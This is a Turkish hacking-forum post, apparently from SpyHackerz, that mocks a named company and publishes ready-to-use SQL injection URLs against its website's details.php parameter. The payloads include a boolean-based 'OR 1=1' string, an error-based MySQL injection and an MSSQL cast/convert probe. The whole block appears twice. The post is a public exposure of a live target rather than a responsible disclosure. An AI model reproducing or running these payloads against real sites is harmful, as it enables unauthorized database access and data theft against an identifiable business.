Microsoft partneri ve İCAP sertifikası var. Köklü bir şirket. Dışarıdan kaliteli bir sisteme benziyor ama içine girince anlıyorsunuz...
Önemli olan iç güzelliği. :d
Site: https://www.finvent.com
Boolean Bazlı SQL Açığı:
https://www.finvent.com/details.php?id=' OR 1=1 OR 'ns'='ns
SQL Açığı:
https://www.finvent.com/details.php?id=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Diğer olası SQL Açığı:
https://www.finvent.com/details.php?id='+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
Önemli olan iç güzelliği. :d
Site: https://www.finvent.com
Boolean Bazlı SQL Açığı:
https://www.finvent.com/details.php?id=' OR 1=1 OR 'ns'='ns
SQL Açığı:
https://www.finvent.com/details.php?id=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Diğer olası SQL Açığı:
https://www.finvent.com/details.php?id='+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl